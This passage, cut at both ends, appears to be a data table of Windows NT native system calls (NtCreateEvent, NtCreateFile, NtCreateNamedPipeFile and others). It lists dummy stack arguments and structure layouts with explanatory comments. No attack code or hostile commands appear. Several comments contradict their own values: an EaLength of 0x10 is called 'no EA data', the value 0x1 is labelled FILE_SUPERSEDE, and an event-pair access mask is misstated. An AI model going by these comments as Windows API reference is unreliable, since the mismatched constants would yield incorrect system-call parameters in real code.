None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateEvent\": {\r\n \"ntFunc\": \"NtCreateEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN InitialState (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"EVENT_TYPE EventType (NotificationEvent)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct141\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE EventHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct141\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name specified)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenEvent\": {\r\n \"ntFunc\": \"NtOpenEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct142\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (EVENT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE EventHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct142\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name specified)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtPulseEvent\": {\r\n \"ntFunc\": \"NtPulseEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to LONG PreviousState (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000E00\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryEvent\": {\r\n \"ntFunc\": \"NtQueryEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"EventInformationLength (16 bytes, typical for EVENT_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to EVENT_BASIC_INFORMATION structure (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"EventInformationClass (EventBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtResetEvent\": {\r\n \"ntFunc\": \"NtResetEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to LONG PreviousState (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetEvent\": {\r\n \"ntFunc\": \"NtSetEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LONG PreviousState (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetEventBoostPriority\": {\r\n \"ntFunc\": \"NtSetEventBoostPriority\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateEventPair\": {\r\n \"ntFunc\": \"NtCreateEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (None, default for unnamed event pair)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"DesiredAccess (EVENT_PAIR_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE EventPairHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenEventPair\": {\r\n \"ntFunc\": \"NtOpenEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (None, default for unnamed event pair)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"DesiredAccess (EVENT_PAIR_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE EventPairHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetHighEventPair\": {\r\n \"ntFunc\": \"NtSetHighEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetHighWaitLowEventPair\": {\r\n \"ntFunc\": \"NtSetHighWaitLowEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetHighWaitLowThread\": {\r\n \"ntFunc\": \"NtSetHighWaitLowThread\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtSetLowEventPair\": {\r\n \"ntFunc\": \"NtSetLowEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetLowWaitHighEventPair\": {\r\n \"ntFunc\": \"NtSetLowWaitHighEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (None, typical for illustrative purposes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetLowWaitHighThread\": {\r\n \"ntFunc\": \"NtSetLowWaitHighThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (None, typical for illustrative purposes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitHighEventPair\": {\r\n \"ntFunc\": \"NtWaitHighEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (None, typical for illustrative purposes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitLowEventPair\": {\r\n \"ntFunc\": \"NtWaitLowEventPair\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE EventPairHandle (None, typical for illustrative purposes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCancelIoFile\": {\r\n \"ntFunc\": \"NtCancelIoFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct143\",\r\n \"structureValueExpectations\": \"Status and information fields for I/O completion.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct143\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"STATUS_SUCCESS (default initial value)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Typically zero before I/O completion\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateFile\": {\r\n \"ntFunc\": \"NtCreateFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG EaLength (no EA data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID EaBuffer (None, no EA data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG CreateDisposition (FILE_SUPERSEDE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000007\",\r\n \"additionalComment\": \"ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000080\",\r\n \"additionalComment\": \"ULONG FileAttributes (FILE_ATTRIBUTE_NORMAL)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PLARGE_INTEGER AllocationSize (dummy pointer, None for default size)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct144\",\r\n \"structureValueExpectations\": \"Allocation size in bytes, or None for default.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct145\",\r\n \"structureValueExpectations\": \"Status and information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct146\",\r\n \"structureValueExpectations\": \"Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0012019F\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PHANDLE FileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct144\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"Default allocation size (0 = use default)\"\r\n }\r\n ]\r\n },\r\n \"struct145\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n }\r\n ]\r\n },\r\n \"struct146\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0100\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateMailslotFile\": {\r\n \"ntFunc\": \"NtCreateMailslotFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PLARGE_INTEGER ReadTimeOut (dummy pointer, infinite timeout)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct147\",\r\n \"structureValueExpectations\": \"Timeout in 100-nanosecond intervals, or None for infinite.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG MaxMessageSize (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00010000\",\r\n \"additionalComment\": \"ULONG MailslotQuota (65536 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct148\",\r\n \"structureValueExpectations\": \"Status and information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct149\",\r\n \"structureValueExpectations\": \"Length, RootDirectory, ObjectName, Attributes, SecurityDescriptor, SecurityQualityOfService.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0012019F\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"PHANDLE MailslotFileHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct147\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xFFFFFFFFFFFFFFFF\",\r\n \"fieldComment\": \"Infinite timeout\"\r\n }\r\n ]\r\n },\r\n \"struct148\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Will be set by system\"\r\n }\r\n ]\r\n },\r\n \"struct149\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0110\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateNamedPipeFile\": {\r\n \"ntFunc\": \"NtCreateNamedPipeFile\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"PLARGE_INTEGER DefaultTimeOut (dummy pointer, infinite timeout)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct150\",\r\n \"structureValueExpectations\": \"Timeout in 100-nanosecond intervals, or None for infinite.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00010000\",\r\n \"additionalComment\": \"ULONG OutBufferSize (65536 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00010000\",\r\n \"additionalComment\": \"ULONG InBufferSize (65536 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000000FF\",\r\n \"additionalComment\": \"ULONG MaxInstances (255 instances)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN NonBlocking (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN ReadModeMessage (TRUE, message mode)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WriteModeMessage (TRUE, message mode)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG CreateOptions (FILE_NON_DIRECTORY_FILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG CreateDisposition (FILE_SUPERSEDE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000007\",\r\n \"additionalComment\": \"ULONG ShareAccess (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct151\",\r\n \"structureValueExpectations\": \"Status and information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES 